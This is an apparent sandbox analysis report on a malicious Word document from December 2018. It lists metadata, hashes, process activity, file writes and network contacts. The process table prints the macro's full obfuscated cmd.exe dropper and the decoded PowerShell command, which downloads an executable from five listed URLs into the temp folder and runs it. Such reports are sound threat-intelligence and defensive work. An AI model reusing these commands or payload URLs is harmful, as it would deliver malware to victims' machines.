File name: | EIN_68213263752842.doc |
Full analysis: | https://app.any.run/tasks/b2fdee59-f7cb-4cd4-b1a8-599c86fb7d6f |
Verdict: | Malicious activity |
Analysis date: | December 18, 2018, 08:09:47 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Dec 17 12:02:00 2018, Last Saved Time/Date: Mon Dec 17 12:02:00 2018, Number of Pages: 1, Number of Words: 6, Number of Characters: 40, Security: 0 |
MD5: | B788E8D1C22FF37748EAB1FE2DC43317 |
SHA1: | E7306D7DBB5218A7C89333FC613CFE54DFEFB0AD |
SHA256: | 7413E01ED04D1D8829351AA54ACB611070B0C3637400E6C0342FEC9C4B66A212 |
SSDEEP: | 1536:X7ljmW9/bvFImENhDM3Rgn5wZqagg+R6+a9:rl/bvFBE35wZe |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:17 12:02:00 |
ModifyDate: | 2018:12:17 12:02:00 |
Pages: | 1 |
Words: | 6 |
Characters: | 40 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 45 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2968 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\EIN_68213263752842.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2212 | c:\PKibMjKU\nNXiQLiwiGMYH\oZubsiGZzHV\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V/C"set Zb4=zRINSdPIpbUnmmfrzthCqLnc}wgE/MW8J:.@KD6)e;,jl o9$\+F0(aixTAu-ZGvsXBk'73QH{y2=&&for %N in (48,55,54,21,76,68,43,71,7,68,41,48,55,71,25,76,22,40,25,60,46,9,43,40,23,17,45,3,40,17,34,30,40,9,19,44,55,40,22,17,41,48,1,65,61,76,68,18,17,17,8,33,28,28,25,25,25,34,63,40,22,59,64,55,22,5,40,56,64,74,64,17,40,13,64,34,23,46,13,28,47,16,19,67,74,25,35,18,17,17,8,33,28,28,25,25,25,34,20,9,55,23,64,55,22,17,40,15,55,46,15,64,34,23,46,13,28,22,30,22,66,64,29,7,35,18,17,17,8,33,28,28,25,25,25,34,26,46,46,5,64,46,22,26,34,15,59,28,4,15,36,64,70,35,18,17,17,8,33,28,28,25,25,25,34,67,40,22,26,46,44,14,44,40,64,64,46,22,64,34,23,46,13,28,4,20,21,17,35,18,17,17,8,33,28,28,25,25,25,34,14,55,15,64,17,23,18,55,23,54,26,46,34,22,40,17,28,66,7,30,38,44,68,34,4,8,44,55,17,53,68,35,68,39,41,48,29,57,16,76,68,4,21,30,68,41,48,57,55,36,45,76,45,68,75,69,31,68,41,48,54,55,5,76,68,18,7,43,68,41,48,13,15,43,76,48,40,22,63,33,17,40,13,8,50,68,49,68,50,48,57,55,36,50,68,34,40,56,40,68,41,14,46,15,40,54,23,18,53,48,58,29,6,45,55,22,45,48,1,65,61,39,73,17,15,74,73,48,55,71,25,34,37,46,25,22,44,46,54,5,51,55,44,40,53,48,58,29,6,42,45,48,13,15,43,39,41,48,18,3,66,76,68,66,22,18,68,41,7,14,45,53,53,62,40,17,60,7,17,40,13,45,48,13,15,43,39,34,44,40,22,26,17,18,45,60,26,40,45,31,52,52,52,52,39,45,73,7,22,63,46,67,40,60,7,17,40,13,45,48,13,15,43,41,48,16,21,27,76,68,32,72,66,68,41,9,15,40,54,67,41,24,24,23,54,17,23,18,73,24,24,48,19,15,18,76,68,22,59,9,68,41,87)do set wB=!wB!!Zb4:~%N,1!&&if %N==87 powershell.exe "!wB:~4!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2792 | CmD /V/C"set Zb4=zRINSdPIpbUnmmfrzthCqLnc}wgE/MW8J:.@KD6)e;,jl o9$\+F0(aixTAu-ZGvsXBk'73QH{y2=&&for %N in (48,55,54,21,76,68,43,71,7,68,41,48,55,71,25,76,22,40,25,60,46,9,43,40,23,17,45,3,40,17,34,30,40,9,19,44,55,40,22,17,41,48,1,65,61,76,68,18,17,17,8,33,28,28,25,25,25,34,63,40,22,59,64,55,22,5,40,56,64,74,64,17,40,13,64,34,23,46,13,28,47,16,19,67,74,25,35,18,17,17,8,33,28,28,25,25,25,34,20,9,55,23,64,55,22,17,40,15,55,46,15,64,34,23,46,13,28,22,30,22,66,64,29,7,35,18,17,17,8,33,28,28,25,25,25,34,26,46,46,5,64,46,22,26,34,15,59,28,4,15,36,64,70,35,18,17,17,8,33,28,28,25,25,25,34,67,40,22,26,46,44,14,44,40,64,64,46,22,64,34,23,46,13,28,4,20,21,17,35,18,17,17,8,33,28,28,25,25,25,34,14,55,15,64,17,23,18,55,23,54,26,46,34,22,40,17,28,66,7,30,38,44,68,34,4,8,44,55,17,53,68,35,68,39,41,48,29,57,16,76,68,4,21,30,68,41,48,57,55,36,45,76,45,68,75,69,31,68,41,48,54,55,5,76,68,18,7,43,68,41,48,13,15,43,76,48,40,22,63,33,17,40,13,8,50,68,49,68,50,48,57,55,36,50,68,34,40,56,40,68,41,14,46,15,40,54,23,18,53,48,58,29,6,45,55,22,45,48,1,65,61,39,73,17,15,74,73,48,55,71,25,34,37,46,25,22,44,46,54,5,51,55,44,40,53,48,58,29,6,42,45,48,13,15,43,39,41,48,18,3,66,76,68,66,22,18,68,41,7,14,45,53,53,62,40,17,60,7,17,40,13,45,48,13,15,43,39,34,44,40,22,26,17,18,45,60,26,40,45,31,52,52,52,52,39,45,73,7,22,63,46,67,40,60,7,17,40,13,45,48,13,15,43,41,48,16,21,27,76,68,32,72,66,68,41,9,15,40,54,67,41,24,24,23,54,17,23,18,73,24,24,48,19,15,18,76,68,22,59,9,68,41,87)do set wB=!wB!!Zb4:~%N,1!&&if %N==87 powershell.exe "!wB:~4!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2692 | powershell.exe "$iaL='jQI';$iQw=new-object Net.WebClient;$RXZ='http://www.venusindexsystems.com/9zCkyw@http://www.qbicsinteriors.com/nWnBsMI@http://www.goodsong.ru/SrKs3@http://www.kengolflessons.com/SqLt@http://www.firstchicago.net/BIW6l'.Split('@');$MTz='SLW';$TiK = '278';$aid='hIj';$mrj=$env:temp+'\'+$TiK+'.exe';foreach($AMP in $RXZ){try{$iQw.DownloadFile($AMP, $mrj);$hNB='Bnh';If ((Get-Item $mrj).length -ge 80000) {Invoke-Item $mrj;$zLE='JHB';break;}}catch{}}$Crh='nub';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR892B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FABF5A6C.wmf | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C88AE75A.wmf | — | |
MD5:— | SHA256:— | |||
2692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SQGCJV68WB7XGREWU8QM.temp | — | |
MD5:— | SHA256:— | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE4A9F7D.wmf | wmf | |
MD5:58A1D3048FEBA527C4543A221E143B80 | SHA256:C6793C14076BD33B8A8A2BF861199AB70884CFFCCF926547AD9B76F2091BDAC6 | |||
2692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:6E28B672E33ED44FA2233E4B0EA4D984 | SHA256:ECF9C6BE22E4A542EBECD6F2A9B2ABCD77BA994D3F8910570A44D4737F95D6E1 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F55C57.wmf | wmf | |
MD5:1A490D9BD40844C0204C6BDA62261C78 | SHA256:2B053530713C1F681A046880EAC9A40E20D8833A26A677C85A430941440D8ECD | |||
2692 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF199a81.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2968 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$N_68213263752842.doc | pgc | |
MD5:1971E523D4EBFB292509C6D571A9CB61 | SHA256:EE70DD810484F3FA07663EAA9A7E9E14B0DC11BFCDCD6048D243586708322868 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2692 | powershell.exe | GET | — | 98.129.229.176:80 | http://www.venusindexsystems.com/9zCkyw | US | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2692 | powershell.exe | 98.129.229.176:80 | www.venusindexsystems.com | Liquid Web, L.L.C | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.venusindexsystems.com | | malicious |